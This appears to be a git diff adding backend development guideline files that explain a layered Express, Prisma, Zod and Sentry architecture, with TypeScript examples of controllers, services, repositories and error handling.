- **Auth Service** (✅ Mature) - Use as template for authentication patterns

---

## Anti-Patterns to Avoid

- ❌ Business logic in routes
- ❌ Direct process.env usage
- ❌ Missing error handling
- ❌ No input validation
- ❌ Direct Prisma everywhere
- ❌ console.log instead of Sentry

---

## Navigation Guide

| Need to... | Read this |
|------------|-----------|
| Understand architecture | [architecture-overview.md](architecture-overview.md) |
| Create routes/controllers | [routing-and-controllers.md](routing-and-controllers.md) |
| Organize business logic | [services-and-repositories.md](services-and-repositories.md) |
| Validate input | [validation-patterns.md](validation-patterns.md) |
| Add error tracking | [sentry-and-monitoring.md](sentry-and-monitoring.md) |
| Create middleware | [middleware-guide.md](middleware-guide.md) |
| Database access | [database-patterns.md](database-patterns.md) |
| Manage config | [configuration.md](configuration.md) |
| Handle async/errors | [async-and-errors.md](async-and-errors.md) |
| Write tests | [testing-guide.md](testing-guide.md) |
| See examples | [complete-examples.md](complete-examples.md) |

---

## Resource Files

### [architecture-overview.md](architecture-overview.md)
Layered architecture, request lifecycle, separation of concerns

### [routing-and-controllers.md](routing-and-controllers.md)
Route definitions, BaseController, error handling, examples

### [services-and-repositories.md](services-and-repositories.md)
Service patterns, DI, repository pattern, caching

### [validation-patterns.md](validation-patterns.md)
Zod schemas, validation, DTO pattern

### [sentry-and-monitoring.md](sentry-and-monitoring.md)
Sentry init, error capture, performance monitoring

### [middleware-guide.md](middleware-guide.md)
Auth, audit, error boundaries, AsyncLocalStorage

### [database-patterns.md](database-patterns.md)
PrismaService, repositories, transactions, optimization

### [configuration.md](configuration.md)
UnifiedConfig, environment configs, secrets

### [async-and-errors.md](async-and-errors.md)
Async patterns, custom errors, asyncErrorWrapper

### [testing-guide.md](testing-guide.md)
Unit/integration tests, mocking, coverage

### [complete-examples.md](complete-examples.md)
Full examples, refactoring guide

---

## Related Skills

- **database-verification** - Verify column names and schema consistency
- **error-tracking** - Sentry integration patterns
- **skill-developer** - Meta-skill for creating and managing skills

---

**Skill Status**: COMPLETE ✅
**Line Count**: < 500 ✅
**Progressive Disclosure**: 11 resource files ✅
451
skills/backend-dev-guidelines/resources/architecture-overview.md
Normal file
@@ -0,0 +1,451 @@
# Architecture Overview - Backend Services

Complete guide to the layered architecture pattern used in backend microservices.

## Table of Contents

- [Layered Architecture Pattern](#layered-architecture-pattern)
- [Request Lifecycle](#request-lifecycle)
- [Service Comparison](#service-comparison)
- [Directory Structure Rationale](#directory-structure-rationale)
- [Module Organization](#module-organization)
- [Separation of Concerns](#separation-of-concerns)

---

## Layered Architecture Pattern

### The Four Layers

```
┌─────────────────────────────────────┐
│           HTTP Request              │
└───────────────┬─────────────────────┘
                ↓
┌─────────────────────────────────────┐
│  Layer 1: ROUTES                    │
│  - Route definitions only           │
│  - Middleware registration          │
│  - Delegate to controllers          │
│  - NO business logic                │
└───────────────┬─────────────────────┘
                ↓
┌─────────────────────────────────────┐
│  Layer 2: CONTROLLERS               │
│  - Request/response handling        │
│  - Input validation                 │
│  - Call services                    │
│  - Format responses                 │
│  - Error handling                   │
└───────────────┬─────────────────────┘
                ↓
┌─────────────────────────────────────┐
│  Layer 3: SERVICES                  │
│  - Business logic                   │
│  - Orchestration                    │
│  - Call repositories                │
│  - No HTTP knowledge                │
└───────────────┬─────────────────────┘
                ↓
┌─────────────────────────────────────┐
│  Layer 4: REPOSITORIES              │
│  - Data access abstraction          │
│  - Prisma operations                │
│  - Query optimization               │
│  - Caching                          │
└───────────────┬─────────────────────┘
                ↓
┌─────────────────────────────────────┐
│         Database (MySQL)            │
└─────────────────────────────────────┘
```

### Why This Architecture?

**Testability:**
- Each layer can be tested independently
- Easy to mock dependencies
- Clear test boundaries

**Maintainability:**
- Changes isolated to specific layers
- Business logic separate from HTTP concerns
- Easy to locate bugs

**Reusability:**
- Services can be used by routes, cron jobs, scripts
- Repositories hide database implementation
- Business logic not tied to HTTP

**Scalability:**
- Easy to add new endpoints
- Clear patterns to follow
- Consistent structure
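The testability claim above can be made concrete: because a service only depends on its repository's interface, a unit test replaces the database layer with a hand-rolled stub. A self-contained sketch (names like `UserService` and `findByEmail` follow this guide's examples; the stub data is illustrative):

```typescript
interface User { id: number; email: string; }

interface UserRepo {
  findByEmail(email: string): Promise<User | null>;
  create(data: { email: string }): Promise<User>;
}

class ConflictError extends Error {}

class UserService {
  constructor(private readonly repo: UserRepo) {}

  async create(data: { email: string }): Promise<User> {
    // Business rule under test: reject duplicate emails.
    if (await this.repo.findByEmail(data.email)) {
      throw new ConflictError('Email already exists');
    }
    return this.repo.create(data);
  }
}

// The stub replaces the repository layer entirely; no database needed.
const stub: UserRepo = {
  findByEmail: async (email) =>
    email === 'taken@example.com' ? { id: 1, email } : null,
  create: async (data) => ({ id: 2, ...data }),
};
```

The same service instance runs unchanged in production with the real Prisma-backed repository injected instead of the stub.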
---

## Request Lifecycle

### Complete Flow Example

```
1. HTTP POST /api/users
   ↓
2. Express matches route in userRoutes.ts
   ↓
3. Middleware chain executes:
   - SSOMiddleware.verifyLoginStatus (authentication)
   - auditMiddleware (context tracking)
   ↓
4. Route handler delegates to controller:
   router.post('/users', (req, res) => userController.create(req, res))
   ↓
5. Controller validates and calls service:
   - Validate input with Zod
   - Call userService.create(data)
   - Handle success/error
   ↓
6. Service executes business logic:
   - Check business rules
   - Call userRepository.create(data)
   - Return result
   ↓
7. Repository performs database operation:
   - PrismaService.main.user.create({ data })
   - Handle database errors
   - Return created user
   ↓
8. Response flows back:
   Repository → Service → Controller → Express → Client
```

### Middleware Execution Order

**Critical:** Middleware executes in registration order

```typescript
app.use(Sentry.Handlers.requestHandler());        // 1. Sentry tracing (FIRST)
app.use(express.json());                          // 2. Body parsing
app.use(express.urlencoded({ extended: true }));  // 3. URL encoding
app.use(cookieParser());                          // 4. Cookie parsing
app.use(SSOMiddleware.initialize());              // 5. Auth initialization
// ... routes registered here
app.use(auditMiddleware);                         // 6. Audit (if global)
app.use(errorBoundary);                           // 7. Error handler (LAST)
app.use(Sentry.Handlers.errorHandler());          // 8. Sentry errors (LAST)
```

**Rule:** Error handlers must be registered AFTER routes!

---

## Service Comparison

### Email Service (Mature Pattern ✅)

**Strengths:**
- Comprehensive BaseController with Sentry integration
- Clean route delegation (no business logic in routes)
- Consistent dependency injection pattern
- Good middleware organization
- Type-safe throughout
- Excellent error handling

**Example Structure:**

```
email/src/
├── controllers/
│   ├── BaseController.ts          ✅ Excellent template
│   ├── NotificationController.ts  ✅ Extends BaseController
│   └── EmailController.ts         ✅ Clean patterns
├── routes/
│   ├── notificationRoutes.ts      ✅ Clean delegation
│   └── emailRoutes.ts             ✅ No business logic
├── services/
│   ├── NotificationService.ts     ✅ Dependency injection
│   └── BatchingService.ts         ✅ Clear responsibility
└── middleware/
    ├── errorBoundary.ts           ✅ Comprehensive
    └── DevImpersonationSSOMiddleware.ts
```

**Use as template** for new services!

### Form Service (Transitioning ⚠️)

**Strengths:**
- Excellent workflow architecture (event sourcing)
- Good Sentry integration
- Innovative audit middleware (AsyncLocalStorage)
- Comprehensive permission system

**Weaknesses:**
- Some routes have 200+ lines of business logic
- Inconsistent controller naming
- Direct process.env usage (60+ occurrences)
- Minimal repository pattern usage

**Example:**

```
form/src/
├── routes/
│   ├── responseRoutes.ts          ❌ Business logic in routes
│   └── proxyRoutes.ts             ✅ Good validation pattern
├── controllers/
│   ├── formController.ts          ⚠️ Lowercase naming
│   └── UserProfileController.ts   ✅ PascalCase naming
├── workflow/                      ✅ Excellent architecture!
│   ├── core/
│   │   ├── WorkflowEngineV3.ts    ✅ Event sourcing
│   │   └── DryRunWrapper.ts       ✅ Innovative
│   └── services/
└── middleware/
    └── auditMiddleware.ts         ✅ AsyncLocalStorage pattern
```

**Learn from:** workflow/, middleware/auditMiddleware.ts
**Avoid:** responseRoutes.ts, direct process.env

---

## Directory Structure Rationale

### Controllers Directory

**Purpose:** Handle HTTP request/response concerns

**Contents:**
- `BaseController.ts` - Base class with common methods
- `{Feature}Controller.ts` - Feature-specific controllers

**Naming:** PascalCase + Controller

**Responsibilities:**
- Parse request parameters
- Validate input (Zod)
- Call appropriate service methods
- Format responses
- Handle errors (via BaseController)
- Set HTTP status codes

### Services Directory

**Purpose:** Business logic and orchestration

**Contents:**
- `{feature}Service.ts` - Feature business logic

**Naming:** camelCase + Service (or PascalCase + Service)

**Responsibilities:**
- Implement business rules
- Orchestrate multiple repositories
- Transaction management
- Business validations
- No HTTP knowledge (Request/Response types)

### Repositories Directory

**Purpose:** Data access abstraction

**Contents:**
- `{Entity}Repository.ts` - Database operations for entity

**Naming:** PascalCase + Repository

**Responsibilities:**
- Prisma query operations
- Query optimization
- Database error handling
- Caching layer
- Hide Prisma implementation details

**Current Gap:** Only 1 repository exists (WorkflowRepository)

### Routes Directory

**Purpose:** Route registration ONLY

**Contents:**
- `{feature}Routes.ts` - Express router for feature

**Naming:** camelCase + Routes

**Responsibilities:**
- Register routes with Express
- Apply middleware
- Delegate to controllers
- **NO business logic!**

### Middleware Directory

**Purpose:** Cross-cutting concerns

**Contents:**
- Authentication middleware
- Audit middleware
- Error boundaries
- Validation middleware
- Custom middleware

**Naming:** camelCase

**Types:**
- Request processing (before handler)
- Response processing (after handler)
- Error handling (error boundary)

### Config Directory

**Purpose:** Configuration management

**Contents:**
- `unifiedConfig.ts` - Type-safe configuration
- Environment-specific configs

**Pattern:** Single source of truth

### Types Directory

**Purpose:** TypeScript type definitions

**Contents:**
- `{feature}.types.ts` - Feature-specific types
- DTOs (Data Transfer Objects)
- Request/Response types
- Domain models

---

## Module Organization

### Feature-Based Organization

For large features, use subdirectories:

```
src/workflow/
├── core/        # Core engine
├── services/    # Workflow-specific services
├── actions/     # System actions
├── models/      # Domain models
├── validators/  # Workflow validation
└── utils/       # Workflow utilities
```

**When to use:**
- Feature has 5+ files
- Clear sub-domains exist
- Logical grouping improves clarity

### Flat Organization

For simple features:

```
src/
├── controllers/UserController.ts
├── services/userService.ts
├── routes/userRoutes.ts
└── repositories/UserRepository.ts
```

**When to use:**
- Simple features (< 5 files)
- No clear sub-domains
- Flat structure is clearer

---

## Separation of Concerns

### What Goes Where

**Routes Layer:**
- ✅ Route definitions
- ✅ Middleware registration
- ✅ Controller delegation
- ❌ Business logic
- ❌ Database operations
- ❌ Validation logic (should be in validator or controller)

**Controllers Layer:**
- ✅ Request parsing (params, body, query)
- ✅ Input validation (Zod)
- ✅ Service calls
- ✅ Response formatting
- ✅ Error handling
- ❌ Business logic
- ❌ Database operations

**Services Layer:**
- ✅ Business logic
- ✅ Business rules enforcement
- ✅ Orchestration (multiple repos)
- ✅ Transaction management
- ❌ HTTP concerns (Request/Response)
- ❌ Direct Prisma calls (use repositories)

**Repositories Layer:**
- ✅ Prisma operations
- ✅ Query construction
- ✅ Database error handling
- ✅ Caching
- ❌ Business logic
- ❌ HTTP concerns

### Example: User Creation

**Route:**

```typescript
router.post('/users',
  SSOMiddleware.verifyLoginStatus,
  auditMiddleware,
  (req, res) => userController.create(req, res)
);
```

**Controller:**

```typescript
async create(req: Request, res: Response): Promise<void> {
  try {
    const validated = createUserSchema.parse(req.body);
    const user = await this.userService.create(validated);
    this.handleSuccess(res, user, 'User created');
  } catch (error) {
    this.handleError(error, res, 'create');
  }
}
```

**Service:**

```typescript
async create(data: CreateUserDTO): Promise<User> {
  // Business rule: check if email already exists
  const existing = await this.userRepository.findByEmail(data.email);
  if (existing) throw new ConflictError('Email already exists');

  // Create user
  return await this.userRepository.create(data);
}
```

**Repository:**

```typescript
async create(data: CreateUserDTO): Promise<User> {
  return PrismaService.main.user.create({ data });
}

async findByEmail(email: string): Promise<User | null> {
  return PrismaService.main.user.findUnique({ where: { email } });
}
```

**Notice:** Each layer has clear, distinct responsibilities!

---

**Related Files:**
- [SKILL.md](SKILL.md) - Main guide
- [routing-and-controllers.md](routing-and-controllers.md) - Routes and controllers details
- [services-and-repositories.md](services-and-repositories.md) - Service and repository patterns
307
skills/backend-dev-guidelines/resources/async-and-errors.md
Normal file
@@ -0,0 +1,307 @@
# Async Patterns and Error Handling

Complete guide to async/await patterns and custom error handling.

## Table of Contents

- [Async/Await Best Practices](#asyncawait-best-practices)
- [Promise Error Handling](#promise-error-handling)
- [Custom Error Types](#custom-error-types)
- [asyncErrorWrapper Utility](#asyncerrorwrapper-utility)
- [Error Propagation](#error-propagation)
- [Common Async Pitfalls](#common-async-pitfalls)

---

## Async/Await Best Practices

### Always Use Try-Catch

```typescript
// ❌ NEVER: Unhandled async errors
async function fetchData() {
  const data = await database.query(); // If this throws, the error is unhandled!
  return data;
}

// ✅ ALWAYS: Wrap in try-catch
async function fetchData() {
  try {
    const data = await database.query();
    return data;
  } catch (error) {
    Sentry.captureException(error);
    throw error;
  }
}
```

### Avoid .then() Chains

```typescript
// ❌ AVOID: Promise chains
function processData() {
  return fetchData()
    .then(data => transform(data))
    .then(transformed => save(transformed))
    .catch(error => {
      console.error(error);
    });
}

// ✅ PREFER: Async/await
async function processData() {
  try {
    const data = await fetchData();
    const transformed = await transform(data);
    return await save(transformed);
  } catch (error) {
    Sentry.captureException(error);
    throw error;
  }
}
```

---

## Promise Error Handling

### Parallel Operations

```typescript
// ✅ Handle errors in Promise.all
try {
  const [users, profiles, settings] = await Promise.all([
    userService.getAll(),
    profileService.getAll(),
    settingsService.getAll(),
  ]);
} catch (error) {
  // One failure fails all
  Sentry.captureException(error);
  throw error;
}

// ✅ Handle errors individually with Promise.allSettled
const results = await Promise.allSettled([
  userService.getAll(),
  profileService.getAll(),
  settingsService.getAll(),
]);

results.forEach((result, index) => {
  if (result.status === 'rejected') {
    Sentry.captureException(result.reason, {
      tags: { operation: ['users', 'profiles', 'settings'][index] }
    });
  }
});
```

---

## Custom Error Types

### Define Custom Errors

```typescript
// Base error class
export class AppError extends Error {
  constructor(
    message: string,
    public code: string,
    public statusCode: number,
    public isOperational: boolean = true
  ) {
    super(message);
    this.name = this.constructor.name;
    Error.captureStackTrace(this, this.constructor);
  }
}

// Specific error types
export class ValidationError extends AppError {
  constructor(message: string) {
    super(message, 'VALIDATION_ERROR', 400);
  }
}

export class NotFoundError extends AppError {
  constructor(message: string) {
    super(message, 'NOT_FOUND', 404);
  }
}

export class ForbiddenError extends AppError {
  constructor(message: string) {
    super(message, 'FORBIDDEN', 403);
  }
}

export class ConflictError extends AppError {
  constructor(message: string) {
    super(message, 'CONFLICT', 409);
  }
}
```

### Usage

```typescript
// Throw specific errors
if (!user) {
  throw new NotFoundError('User not found');
}

if (user.age < 18) {
  throw new ValidationError('User must be 18+');
}

// Error boundary handles them
function errorBoundary(error, req, res, next) {
  if (error instanceof AppError) {
    return res.status(error.statusCode).json({
      error: {
        message: error.message,
        code: error.code
      }
    });
  }

  // Unknown error
  Sentry.captureException(error);
  res.status(500).json({ error: { message: 'Internal server error' } });
}
```

---

## asyncErrorWrapper Utility

### Pattern
|
|
||||||
|
```typescript
|
||||||
|
export function asyncErrorWrapper(
|
||||||
|
handler: (req: Request, res: Response, next: NextFunction) => Promise<any>
|
||||||
|
) {
|
||||||
|
return async (req: Request, res: Response, next: NextFunction) => {
|
||||||
|
try {
|
||||||
|
await handler(req, res, next);
|
||||||
|
} catch (error) {
|
||||||
|
next(error);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
}
|
||||||
|
```
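
The guarantee this pattern provides can be exercised without Express at all. A minimal, self-contained sketch (the simplified types below are stand-ins, not Express's real `Request`/`Response`/`NextFunction`):

```typescript
// Self-contained sketch: a rejected handler's error is routed to next()
// instead of becoming an unhandled promise rejection.
type Handler = (req: unknown, res: unknown, next: (err?: unknown) => void) => Promise<unknown>;

function asyncErrorWrapper(handler: Handler) {
  return async (req: unknown, res: unknown, next: (err?: unknown) => void) => {
    try {
      await handler(req, res, next);
    } catch (error) {
      next(error); // in Express, this reaches the error-handling middleware
    }
  };
}

const failing = asyncErrorWrapper(async () => {
  throw new Error('boom');
});

let captured: unknown;
failing({}, {}, (err) => { captured = err; }).then(() => {
  console.assert(captured instanceof Error && (captured as Error).message === 'boom');
});
```

Because the wrapper awaits the handler inside its own `try`, both synchronous throws and rejected promises end up in the same `catch`.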

### Usage

```typescript
// Without wrapper - error can be unhandled
router.get('/users', async (req, res) => {
  const users = await userService.getAll(); // If it throws, the rejection is unhandled!
  res.json(users);
});

// With wrapper - errors caught
router.get('/users', asyncErrorWrapper(async (req, res) => {
  const users = await userService.getAll();
  res.json(users);
}));
```

---

## Error Propagation

### Proper Error Chains

```typescript
// ✅ Propagate errors up the stack
async function repositoryMethod() {
  try {
    return await PrismaService.main.user.findMany();
  } catch (error) {
    Sentry.captureException(error, { tags: { layer: 'repository' } });
    throw error; // Propagate to service
  }
}

async function serviceMethod() {
  try {
    return await repositoryMethod();
  } catch (error) {
    Sentry.captureException(error, { tags: { layer: 'service' } });
    throw error; // Propagate to controller
  }
}

async function controllerMethod(req, res) {
  try {
    const result = await serviceMethod();
    res.json(result);
  } catch (error) {
    this.handleError(error, res, 'controllerMethod'); // Final handler
  }
}
```

---

## Common Async Pitfalls

### Fire and Forget (Bad)

```typescript
// ❌ NEVER: Fire and forget
async function processRequest(req, res) {
  sendEmail(user.email); // Fires async, errors unhandled!
  res.json({ success: true });
}

// ✅ ALWAYS: Await or handle
async function processRequest(req, res) {
  try {
    await sendEmail(user.email);
    res.json({ success: true });
  } catch (error) {
    Sentry.captureException(error);
    res.status(500).json({ error: 'Failed to send email' });
  }
}

// ✅ OR: Intentional background task
async function processRequest(req, res) {
  sendEmail(user.email).catch(error => {
    Sentry.captureException(error);
  });
  res.json({ success: true });
}
```

### Unhandled Rejections

```typescript
// ✅ Global handlers for unhandled rejections
process.on('unhandledRejection', (reason, promise) => {
  Sentry.captureException(reason, {
    tags: { type: 'unhandled_rejection' }
  });
  console.error('Unhandled Rejection:', reason);
});

process.on('uncaughtException', (error) => {
  Sentry.captureException(error, {
    tags: { type: 'uncaught_exception' }
  });
  console.error('Uncaught Exception:', error);
  process.exit(1);
});
```

---

**Related Files:**

- [SKILL.md](SKILL.md)
- [sentry-and-monitoring.md](sentry-and-monitoring.md)
- [complete-examples.md](complete-examples.md)
638
skills/backend-dev-guidelines/resources/complete-examples.md
Normal file
@@ -0,0 +1,638 @@
# Complete Examples - Full Working Code

Real-world examples showing complete implementation patterns.

## Table of Contents

- [Complete Controller Example](#complete-controller-example)
- [Complete Service with DI](#complete-service-with-di)
- [Complete Route File](#complete-route-file)
- [Complete Repository](#complete-repository)
- [Refactoring Example: Bad to Good](#refactoring-example-bad-to-good)
- [End-to-End Feature Example](#end-to-end-feature-example)

---

## Complete Controller Example

### UserController (Following All Best Practices)

```typescript
// controllers/UserController.ts
import { Request, Response } from 'express';
import { BaseController } from './BaseController';
import { UserService } from '../services/userService';
import { createUserSchema, updateUserSchema } from '../validators/userSchemas';
import { z } from 'zod';

export class UserController extends BaseController {
  private userService: UserService;

  constructor() {
    super();
    this.userService = new UserService();
  }

  async getUser(req: Request, res: Response): Promise<void> {
    try {
      this.addBreadcrumb('Fetching user', 'user_controller', {
        userId: req.params.id,
      });

      const user = await this.withTransaction(
        'user.get',
        'db.query',
        () => this.userService.findById(req.params.id)
      );

      if (!user) {
        return this.handleError(
          new Error('User not found'),
          res,
          'getUser',
          404
        );
      }

      this.handleSuccess(res, user);
    } catch (error) {
      this.handleError(error, res, 'getUser');
    }
  }

  async listUsers(req: Request, res: Response): Promise<void> {
    try {
      const users = await this.userService.getAll();
      this.handleSuccess(res, users);
    } catch (error) {
      this.handleError(error, res, 'listUsers');
    }
  }

  async createUser(req: Request, res: Response): Promise<void> {
    try {
      // Validate input with Zod
      const validated = createUserSchema.parse(req.body);

      // Track performance
      const user = await this.withTransaction(
        'user.create',
        'db.mutation',
        () => this.userService.create(validated)
      );

      this.handleSuccess(res, user, 'User created successfully', 201);
    } catch (error) {
      if (error instanceof z.ZodError) {
        return this.handleError(error, res, 'createUser', 400);
      }
      this.handleError(error, res, 'createUser');
    }
  }

  async updateUser(req: Request, res: Response): Promise<void> {
    try {
      const validated = updateUserSchema.parse(req.body);

      const user = await this.userService.update(
        req.params.id,
        validated
      );

      this.handleSuccess(res, user, 'User updated');
    } catch (error) {
      if (error instanceof z.ZodError) {
        return this.handleError(error, res, 'updateUser', 400);
      }
      this.handleError(error, res, 'updateUser');
    }
  }

  async deleteUser(req: Request, res: Response): Promise<void> {
    try {
      await this.userService.delete(req.params.id);
      this.handleSuccess(res, null, 'User deleted', 204);
    } catch (error) {
      this.handleError(error, res, 'deleteUser');
    }
  }
}
```

---

## Complete Service with DI

### UserService

```typescript
// services/userService.ts
import { UserRepository } from '../repositories/UserRepository';
import { ConflictError, NotFoundError, ValidationError } from '../types/errors';
import type { CreateUserDTO, UpdateUserDTO, User } from '../types/user.types';

export class UserService {
  private userRepository: UserRepository;

  constructor(userRepository?: UserRepository) {
    this.userRepository = userRepository || new UserRepository();
  }

  async findById(id: string): Promise<User | null> {
    return await this.userRepository.findById(id);
  }

  async getAll(): Promise<User[]> {
    return await this.userRepository.findActive();
  }

  async create(data: CreateUserDTO): Promise<User> {
    // Business rule: validate age
    if (data.age < 18) {
      throw new ValidationError('User must be 18 or older');
    }

    // Business rule: check email uniqueness
    const existing = await this.userRepository.findByEmail(data.email);
    if (existing) {
      throw new ConflictError('Email already in use');
    }

    // Create user with profile
    return await this.userRepository.create({
      email: data.email,
      profile: {
        create: {
          firstName: data.firstName,
          lastName: data.lastName,
          age: data.age,
        },
      },
    });
  }

  async update(id: string, data: UpdateUserDTO): Promise<User> {
    // Check exists
    const existing = await this.userRepository.findById(id);
    if (!existing) {
      throw new NotFoundError('User not found');
    }

    // Business rule: email uniqueness if changing
    if (data.email && data.email !== existing.email) {
      const emailTaken = await this.userRepository.findByEmail(data.email);
      if (emailTaken) {
        throw new ConflictError('Email already in use');
      }
    }

    return await this.userRepository.update(id, data);
  }

  async delete(id: string): Promise<void> {
    const existing = await this.userRepository.findById(id);
    if (!existing) {
      throw new NotFoundError('User not found');
    }

    await this.userRepository.delete(id);
  }
}
```
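
The optional-repository constructor is what makes this service unit-testable: a stub can stand in for the Prisma-backed repository. A condensed, self-contained sketch of that idea (the `Repo` interface and names here are illustrative, not the project's real types):

```typescript
// Condensed sketch of the constructor-injection pattern above, with a stub
// repository standing in for the Prisma-backed one. Names are illustrative.
interface Repo {
  findByEmail(email: string): Promise<{ id: string; email: string } | null>;
  create(data: { email: string }): Promise<{ id: string; email: string }>;
}

class UserServiceSketch {
  constructor(private repo: Repo) {}

  async create(data: { email: string }) {
    if (await this.repo.findByEmail(data.email)) {
      throw new Error('Email already in use'); // ConflictError in the real service
    }
    return this.repo.create(data);
  }
}

// Unit test: no database, just a stub.
const stub: Repo = {
  findByEmail: async () => null,
  create: async (d) => ({ id: 'u1', email: d.email }),
};

new UserServiceSketch(stub).create({ email: 'ada@example.com' })
  .then((user) => console.assert(user.email === 'ada@example.com'));
```

Swapping the stub's `findByEmail` to return an existing user exercises the conflict branch the same way, with no Prisma involved.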

---

## Complete Route File

### userRoutes.ts

```typescript
// routes/userRoutes.ts
import { Router } from 'express';
import { UserController } from '../controllers/UserController';
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';
import { auditMiddleware } from '../middleware/auditMiddleware';

const router = Router();
const controller = new UserController();

// GET /users - List all users
router.get('/',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.listUsers(req, res)
);

// GET /users/:id - Get single user
router.get('/:id',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.getUser(req, res)
);

// POST /users - Create user
router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.createUser(req, res)
);

// PUT /users/:id - Update user
router.put('/:id',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.updateUser(req, res)
);

// DELETE /users/:id - Delete user
router.delete('/:id',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.deleteUser(req, res)
);

export default router;
```

---

## Complete Repository

### UserRepository

```typescript
// repositories/UserRepository.ts
import { PrismaService } from '@project-lifecycle-portal/database';
import type { User, Prisma } from '@prisma/client';

export class UserRepository {
  async findById(id: string): Promise<User | null> {
    return PrismaService.main.user.findUnique({
      where: { id },
      include: { profile: true },
    });
  }

  async findByEmail(email: string): Promise<User | null> {
    return PrismaService.main.user.findUnique({
      where: { email },
      include: { profile: true },
    });
  }

  async findActive(): Promise<User[]> {
    return PrismaService.main.user.findMany({
      where: { isActive: true },
      include: { profile: true },
      orderBy: { createdAt: 'desc' },
    });
  }

  async create(data: Prisma.UserCreateInput): Promise<User> {
    return PrismaService.main.user.create({
      data,
      include: { profile: true },
    });
  }

  async update(id: string, data: Prisma.UserUpdateInput): Promise<User> {
    return PrismaService.main.user.update({
      where: { id },
      data,
      include: { profile: true },
    });
  }

  async delete(id: string): Promise<User> {
    // Soft delete
    return PrismaService.main.user.update({
      where: { id },
      data: {
        isActive: false,
        deletedAt: new Date(),
      },
    });
  }
}
```

---

## Refactoring Example: Bad to Good

### BEFORE: Business Logic in Routes ❌

```typescript
// routes/postRoutes.ts (BAD - 200+ lines)
router.post('/posts', async (req, res) => {
  try {
    const username = res.locals.claims.preferred_username;
    const responses = req.body.responses;
    const stepInstanceId = req.body.stepInstanceId;

    // ❌ Permission check in route
    const userId = await userProfileService.getProfileByEmail(username).then(p => p.id);
    const canComplete = await permissionService.canCompleteStep(userId, stepInstanceId);
    if (!canComplete) {
      return res.status(403).json({ error: 'No permission' });
    }

    // ❌ Business logic in route
    const post = await postRepository.create({
      title: req.body.title,
      content: req.body.content,
      authorId: userId
    });

    // ❌ More business logic...
    if (res.locals.isImpersonating) {
      impersonationContextStore.storeContext(...);
    }

    // ... 100+ more lines

    res.json({ success: true, data: result });
  } catch (e) {
    handler.handleException(res, e);
  }
});
```

### AFTER: Clean Separation ✅

**1. Clean Route:**
```typescript
// routes/postRoutes.ts
import { PostController } from '../controllers/PostController';

const router = Router();
const controller = new PostController();

// ✅ CLEAN: 8 lines total!
router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.createPost(req, res)
);

export default router;
```

**2. Controller:**
```typescript
// controllers/PostController.ts
export class PostController extends BaseController {
  private postService: PostService;

  constructor() {
    super();
    this.postService = new PostService();
  }

  async createPost(req: Request, res: Response): Promise<void> {
    try {
      const validated = createPostSchema.parse({
        ...req.body,
      });

      const result = await this.postService.createPost(
        validated,
        res.locals.userId
      );

      this.handleSuccess(res, result, 'Post created successfully');
    } catch (error) {
      this.handleError(error, res, 'createPost');
    }
  }
}
```

**3. Service:**
```typescript
// services/postService.ts
export class PostService {
  async createPost(
    data: CreatePostDTO,
    userId: string
  ): Promise<SubmissionResult> {
    // Permission check
    const canComplete = await permissionService.canCompleteStep(
      userId,
      data.stepInstanceId
    );

    if (!canComplete) {
      throw new ForbiddenError('No permission to complete step');
    }

    // Execute workflow
    const engine = await createWorkflowEngine();
    const command = new CompleteStepCommand(
      data.stepInstanceId,
      userId,
      data.responses
    );
    const events = await engine.executeCommand(command);

    // Handle impersonation (context: impersonation state resolved earlier, elided here)
    if (context.isImpersonating) {
      await this.handleImpersonation(data.stepInstanceId, context);
    }

    return { events, success: true };
  }

  private async handleImpersonation(stepInstanceId: number, context: any) {
    impersonationContextStore.storeContext(stepInstanceId, {
      originalUserId: context.originalUserId,
      effectiveUserId: context.effectiveUserId,
    });
  }
}
```

**Result:**

- Route: 8 lines (was 200+)
- Controller: 25 lines
- Service: 40 lines
- **Testable, maintainable, reusable!**

---

## End-to-End Feature Example

### Complete User Management Feature

**1. Types:**
```typescript
// types/user.types.ts
export interface User {
  id: string;
  email: string;
  isActive: boolean;
  profile?: UserProfile;
}

export interface CreateUserDTO {
  email: string;
  firstName: string;
  lastName: string;
  age: number;
}

export interface UpdateUserDTO {
  email?: string;
  firstName?: string;
  lastName?: string;
}
```

**2. Validators:**
```typescript
// validators/userSchemas.ts
import { z } from 'zod';

export const createUserSchema = z.object({
  email: z.string().email(),
  firstName: z.string().min(1).max(100),
  lastName: z.string().min(1).max(100),
  age: z.number().int().min(18).max(120),
});

export const updateUserSchema = z.object({
  email: z.string().email().optional(),
  firstName: z.string().min(1).max(100).optional(),
  lastName: z.string().min(1).max(100).optional(),
});
```

**3. Repository:**
```typescript
// repositories/UserRepository.ts
export class UserRepository {
  async findById(id: string): Promise<User | null> {
    return PrismaService.main.user.findUnique({
      where: { id },
      include: { profile: true },
    });
  }

  async create(data: Prisma.UserCreateInput): Promise<User> {
    return PrismaService.main.user.create({
      data,
      include: { profile: true },
    });
  }
}
```

**4. Service:**
```typescript
// services/userService.ts
export class UserService {
  private userRepository: UserRepository;

  constructor() {
    this.userRepository = new UserRepository();
  }

  async create(data: CreateUserDTO): Promise<User> {
    const existing = await this.userRepository.findByEmail(data.email);
    if (existing) {
      throw new ConflictError('Email already exists');
    }

    return await this.userRepository.create({
      email: data.email,
      profile: {
        create: {
          firstName: data.firstName,
          lastName: data.lastName,
          age: data.age,
        },
      },
    });
  }
}
```

**5. Controller:**
```typescript
// controllers/UserController.ts
export class UserController extends BaseController {
  private userService: UserService;

  constructor() {
    super();
    this.userService = new UserService();
  }

  async createUser(req: Request, res: Response): Promise<void> {
    try {
      const validated = createUserSchema.parse(req.body);
      const user = await this.userService.create(validated);
      this.handleSuccess(res, user, 'User created', 201);
    } catch (error) {
      this.handleError(error, res, 'createUser');
    }
  }
}
```

**6. Routes:**
```typescript
// routes/userRoutes.ts
const router = Router();
const controller = new UserController();

router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => controller.createUser(req, res)
);

export default router;
```

